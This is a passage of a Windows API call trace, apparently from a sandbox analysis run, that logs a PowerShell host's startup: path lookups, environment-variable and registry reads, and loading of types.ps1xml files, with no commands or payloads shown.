lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.887] GetLastError () returned 0x7a [0146.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.887] GetLastError () returned 0x7a [0146.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12e5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0146.887] GetLastError () returned 0x7a [0147.082] SetConsoleCtrlHandler (HandlerRoutine=0x2af384a, Add=1) returned 1 [0147.082] GetLastError () returned 0x7a [0149.202] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344 [0149.202] GetLastError () returned 0x0 [0149.207] CoCreateGuid (in: pguid=0x12ead8 | out: pguid=0x12ead8*(Data1=0x7ae3514f, Data2=0x160f, Data3=0x41e1, Data4=([0]=0xbc, [1]=0x2d, [2]=0x6e, [3]=0x4, [4]=0x12, [5]=0x26, [6]=0xc3, [7]=0x67))) returned 0x0 [0149.291] WinSqmIsOptedIn () returned 0x0 [0149.292] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.292] GetLastError () returned 0xcb [0149.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.303] GetLastError () returned 0xcb [0149.304] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.304] GetLastError () returned 0xcb [0149.306] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.306] GetLastError () returned 0xcb [0149.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.308] GetLastError () returned 0xcb [0149.315] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.315] GetLastError () returned 0xcb [0149.316] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.316] GetLastError () returned 0xcb [0149.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.317] GetLastError () returned 0xcb [0149.321] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.321] GetLastError () returned 0xcb [0149.345] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.345] GetLastError () returned 0xcb [0149.346] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.346] GetLastError () returned 0xcb [0149.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.347] GetLastError () returned 0xcb [0150.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.009] GetLastError () returned 0xcb [0150.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.009] GetLastError () returned 0xcb [0150.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.010] GetLastError () returned 0xcb [0150.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.010] GetLastError () returned 0xcb [0150.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.125] GetLastError () returned 0x3 [0150.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.125] GetLastError () returned 0x3 [0150.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.125] GetLastError () returned 0x3 [0150.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.125] GetLastError () returned 0x3 [0150.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.125] GetLastError () returned 0x3 [0150.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.125] GetLastError () returned 0x3 [0150.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.125] GetLastError () returned 0x3 [0150.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.126] GetLastError () returned 0x3 [0150.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.126] GetLastError () returned 0x3 [0150.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.126] GetLastError () returned 0x3 [0150.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.126] GetLastError () returned 0x3 [0150.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.126] GetLastError () returned 0x3 [0150.146] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x69 [0150.147] GetLastError () returned 0x3 [0150.158] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x509ca8, nSize=0x64 | out: lpDst="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modu") returned 0x6a [0150.158] GetLastError () returned 0x3 [0150.158] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x509ca8, nSize=0x6a | out: lpDst="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x6a [0150.158] GetLastError () returned 0x3 [0150.158] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e8f0 | out: phkResult=0x12e8f0*=0x350) returned 0x0 [0150.158] RegQueryValueExW (in: hKey=0x350, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12e934, lpData=0x0, lpcbData=0x12e930*=0x0 | out: lpType=0x12e934*=0x2, lpData=0x0, lpcbData=0x12e930*=0x6c) returned 0x0 [0150.161] RegQueryValueExW (in: hKey=0x350, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12e934, lpData=0x509ca8, lpcbData=0x12e930*=0x6c | out: lpType=0x12e934*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x12e930*=0x6c) returned 0x0 [0150.161] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x509ca8, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0150.161] GetLastError () returned 0x3 [0150.161] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x509ca8, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0150.161] GetLastError () returned 0x3 [0150.162] RegCloseKey (hKey=0x350) returned 0x0 [0150.162] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x509ca8, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0150.162] GetLastError () returned 0x3 [0150.162] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e8f0 | out: phkResult=0x12e8f0*=0x350) returned 0x0 [0150.162] RegQueryValueExW (in: hKey=0x350, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12e934, lpData=0x0, lpcbData=0x12e930*=0x0 | out: lpType=0x12e934*=0x0, lpData=0x0, lpcbData=0x12e930*=0x0) returned 0x2 [0150.163] RegCloseKey (hKey=0x350) returned 0x0 [0150.181] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.181] GetLastError () returned 0xcb [0150.183] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.183] GetLastError () returned 0xcb [0150.237] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.237] GetLastError () returned 0xcb [0150.237] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.237] GetLastError () returned 0xcb [0150.252] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e870 | out: phkResult=0x12e870*=0x350) returned 0x0 [0150.264] RegQueryValueExW (in: hKey=0x350, lpValueName="path", lpReserved=0x0, lpType=0x12e8d8, lpData=0x0, lpcbData=0x12e8d4*=0x0 | out: lpType=0x12e8d8*=0x1, lpData=0x0, lpcbData=0x12e8d4*=0x74) returned 0x0 [0150.266] RegQueryValueExW (in: hKey=0x350, lpValueName="path", lpReserved=0x0, lpType=0x12e8b8, lpData=0x0, lpcbData=0x12e8b4*=0x0 | out: lpType=0x12e8b8*=0x1, lpData=0x0, lpcbData=0x12e8b4*=0x74) returned 0x0 [0150.266] RegQueryValueExW (in: hKey=0x350, lpValueName="path", lpReserved=0x0, lpType=0x12e8b8, lpData=0x509ca8, lpcbData=0x12e8b4*=0x74 | out: lpType=0x12e8b8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12e8b4*=0x74) returned 0x0 [0150.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12e438, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0150.266] GetLastError () returned 0xcb [0150.266] SetErrorMode (uMode=0x1) returned 0x1 [0150.266] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12e8b8 | out: lpFileInformation=0x12e8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0150.266] GetLastError () returned 0xcb [0150.266] SetErrorMode (uMode=0x1) returned 0x1 [0150.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12e42c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0150.270] GetLastError () returned 0xcb [0150.270] SetErrorMode (uMode=0x1) returned 0x1 [0150.270] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12e8ac | out: lpFileInformation=0x12e8ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0150.270] GetLastError () returned 0xcb [0150.270] SetErrorMode (uMode=0x1) returned 0x1 [0150.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12e42c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0150.275] GetLastError () returned 0xcb [0150.275] SetErrorMode (uMode=0x1) returned 0x1 [0150.275] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12e8ac | out: lpFileInformation=0x12e8ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0150.275] GetLastError () returned 0xcb [0150.275] SetErrorMode (uMode=0x1) returned 0x1 [0150.290] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.290] GetLastError () returned 0xcb [0150.292] GetACP () returned 0x4e4 [0150.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0150.331] GetLastError () returned 0x0 [0150.331] SetErrorMode (uMode=0x1) returned 0x1 [0150.333] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358 [0150.334] GetLastError () returned 0x0 [0150.335] GetFileType (hFile=0x358) returned 0x1 [0150.335] SetErrorMode (uMode=0x1) returned 0x1 [0150.335] GetFileType (hFile=0x358) returned 0x1 [0150.345] ReadFile (in: hFile=0x358, lpBuffer=0x2c1fbec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c1fbec*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.345] GetLastError () returned 0x0 [0150.346] ReadFile (in: hFile=0x358, lpBuffer=0x2c1fbec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c1fbec*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.346] GetLastError () returned 0x0 [0150.346] ReadFile (in: hFile=0x358, lpBuffer=0x2c1fbec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c1fbec*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.346] GetLastError () returned 0x0 [0150.346] ReadFile (in: hFile=0x358, lpBuffer=0x2c1fbec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c1fbec*, lpNumberOfBytesRead=0x12e824*=0xcf3, lpOverlapped=0x0) returned 1 [0150.346] GetLastError () returned 0x0 [0150.347] ReadFile (in: hFile=0x358, lpBuffer=0x2c1f07f, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c1f07f*, lpNumberOfBytesRead=0x12e824*=0x0, lpOverlapped=0x0) returned 1 [0150.347] GetLastError () returned 0x0 [0150.347] ReadFile (in: hFile=0x358, lpBuffer=0x2c1fbec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c1fbec*, lpNumberOfBytesRead=0x12e824*=0x0, lpOverlapped=0x0) returned 1 [0150.347] GetLastError () returned 0x0 [0150.348] CloseHandle (hObject=0x358) returned 1 [0150.348] GetLastError () returned 0x0 [0150.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12e384, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0150.349] GetLastError () returned 0x0 [0150.349] SetErrorMode (uMode=0x1) returned 0x1 [0150.349] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2c30f60 | out: lpFileInformation=0x2c30f60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0150.349] GetLastError () returned 0x0 [0150.349] SetErrorMode (uMode=0x1) returned 0x1 [0150.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0150.350] GetLastError () returned 0x0 [0150.350] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e7a8 | out: phkResult=0x12e7a8*=0x358) returned 0x0 [0150.350] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e7f0, lpData=0x0, lpcbData=0x12e7ec*=0x0 | out: lpType=0x12e7f0*=0x1, lpData=0x0, lpcbData=0x12e7ec*=0x56) returned 0x0 [0150.350] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e7f0, lpData=0x509ca8, lpcbData=0x12e7ec*=0x56 | out: lpType=0x12e7f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x12e7ec*=0x56) returned 0x0 [0150.351] RegCloseKey (hKey=0x358) returned 0x0 [0150.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0150.351] GetLastError () returned 0x0 [0150.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12e2e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0150.351] GetLastError () returned 0x0 [0150.465] GetSystemInfo (in: lpSystemInfo=0x12df28 | out: lpSystemInfo=0x12df28*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0150.466] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0150.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0150.519] GetLastError () returned 0x0 [0150.519] SetErrorMode (uMode=0x1) returned 0x1 [0150.519] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358 [0150.519] GetLastError () returned 